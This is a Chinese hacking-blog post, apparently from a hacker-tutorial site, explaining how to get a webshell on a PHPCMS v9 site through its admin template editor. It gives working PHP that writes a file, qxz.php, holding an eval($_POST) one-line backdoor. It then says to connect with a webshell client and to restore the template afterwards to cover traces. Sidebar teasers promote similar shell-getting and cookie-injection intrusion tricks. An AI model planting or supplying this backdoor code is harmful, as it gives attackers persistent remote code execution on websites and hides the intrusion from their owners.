记一次phpcms v9后台拿shell过程

hacker4年前黑客文章710

记一次phpcms v9后台拿shell过程

登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图:

phpcmsV9

然后点击 search 这个文件夹,如下图:

phpcms

然后点击修改 index.html 文件

然后把以下代码复制上去提交。

<?

$fp = @fopen(“qxz.php”, ‘a’);

@fwrite($fp, ‘<’.'?php’.”\r\n\r\n”.’eval($_POST[hacker])’.”\r\n\r\n?”.”>\r\n”);

@fclose($fp);

?>

提示:修改前先把原来的代码备份一下,拿到shell后把他改回去。

1259

提交后点击可视化一下

131117163330

这样在网站的根目录就生成了你的一句话木马客户端 qxz.php

拿起菜刀链接 http://www.xxx.com/qxz.php

0131117164105

 

标签: 黑客技术

相关文章

DirBuster是什么?

DirBuster是什么?

DirBuster是什么? DirBuster的关键目地是找寻掩藏的文件目录和Web服务端网页页面。房地产商有时候会离去贴近但未连接的网页页面;这一专用工具来发觉这种潜在性的系统漏洞。这是一个jav...

Truecrypt是不是适用全部电脑操作系统?

Truecrypt是不是适用全部电脑操作系统?

什么叫Truecrypt? TrueCrypt在2017年五月淘汰以前是一款出色的开源系统磁盘加密系统软件。客户能够 根据键入客户建立的登陆密码语句来对其全部系统文件开展数据加密。它还具备容许客户掩...

与这个名叫“USBee”的新式令人激动的数据信息过虑专用工具

与这个名叫“USBee”的新式令人激动的数据信息过虑专用工具

与这个名叫“USBee”的新式令人激动的数据信息过虑专用工具对比,大家的經典黑客工具目录忽然看上去非常惨白。   被称作“USBee”,因为它以与航行中的蜜峰相近的方法运作,这类黑帽优化专...

南方数据企业网站管理系统12.0拿SHELL方法

南方数据企业网站管理系统12.0插配置文件拿SHELL 在我们拿到南方数据企业管理系统后台账号密码后,可以使用下面的方法来拿shell 进入后台后 点击系统管理 网站配...

那些日子十分火的黑客软件

那些日子十分火的黑客软件

道,可道,非常道;名,可名,十分名。不清楚有几个听过?今日给大伙儿聊一聊那些日子十分火的黑客软件。   一、中国菜刀 中国菜刀是应用十分普遍的一款Webshell可视化工具,技术专业的网...

超级简单的入侵网站教程

关键字:inurl:szwyadmin/login.asp 首先,把下面的代码输入网址 代码:javascript:alert(document.cookie="adminuser="...